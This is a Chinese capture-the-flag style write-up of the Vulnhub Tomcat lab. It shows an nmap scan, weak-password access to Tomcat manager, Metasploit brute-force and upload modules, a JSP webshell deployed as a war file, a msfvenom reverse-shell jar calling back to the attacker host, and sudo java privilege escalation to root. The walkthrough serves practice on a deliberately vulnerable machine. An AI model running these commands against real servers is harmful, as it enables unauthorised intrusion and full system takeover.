推荐
原创
视频
Java开发
iOS开发
前端开发
JavaScript开发
Android开发
PHP开发
数据库
开发工具
Python开发
Kotlin开发
Ruby开发
.NET开发
服务器运维
开放平台
架构师
大数据
云计算
人工智能
开发语言
其它开发
Lambda在线 > MrLee 小师父 > Vulnhub-Tomcat
Vulnhub-Tomcat
MrLee 小师父 2020-04-10
实验环境
kali攻击机ip:192.168.56.116
Tomcat靶机ip:192.168.56.129
知识点
nmap扫描
Tomcat样例目录session操纵漏洞
Tomcat 后台爆破
Tomcat 后台部署war木马getshell
开始渗透
首先第一步对目标靶机网络端口服务扫描
nmap -A –p- 192.168.56.129
扫描发现开放了22(ssh), 8080(http)端口
打开8080端口是一个tomcat,点击manager app尝试使用弱口令tomcat/tomcat登录成功,也可以使用msf的爆破模块
Vulnhub-Tomcat
use auxiliary/scanner/http/tomcat_mgr_loginset rhosts 192.168.56.129exploit
Vulnhub-Tomcat
登录到后台然后直接上传部署war进行shell,准备一个jsp木马,添加为压缩文件,然后把后缀名改成war,上传部署
Vulnhub-Tomcat
部署成功
Vulnhub-Tomcat
使用冰蝎访问木马 http://192.168.56.129/shell/shell.jsp
Vulnhub-Tomcat
也可直接利用msf的模块
useexploit/multi/http/tomcat_mgr_uploadset httppasswordtomcatset httpusernametomcatset rhosts192.168.56.129set rport 8080exploit
Vulnhub-Tomcat
这里我的不能获取shell
使用冰蝎的虚拟终端,sudo –l发现提权信息
Vulnhub-Tomcat
接下来使用msfvemon生成jar木马,上传到靶机/tmp执行,开启监听端口
kali
msfvenom -p java/shell_reverse_tcplhost=192.168.56.116 lport=1234 -f jar > /root/shell.jar
冰蝎终端
cd /tmpsudo/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jarshell.jar
成功反弹得到root权限
至于session操纵就没做了,应该还有其他漏洞
微信搜索m20151798添加好友0daybank
文章评论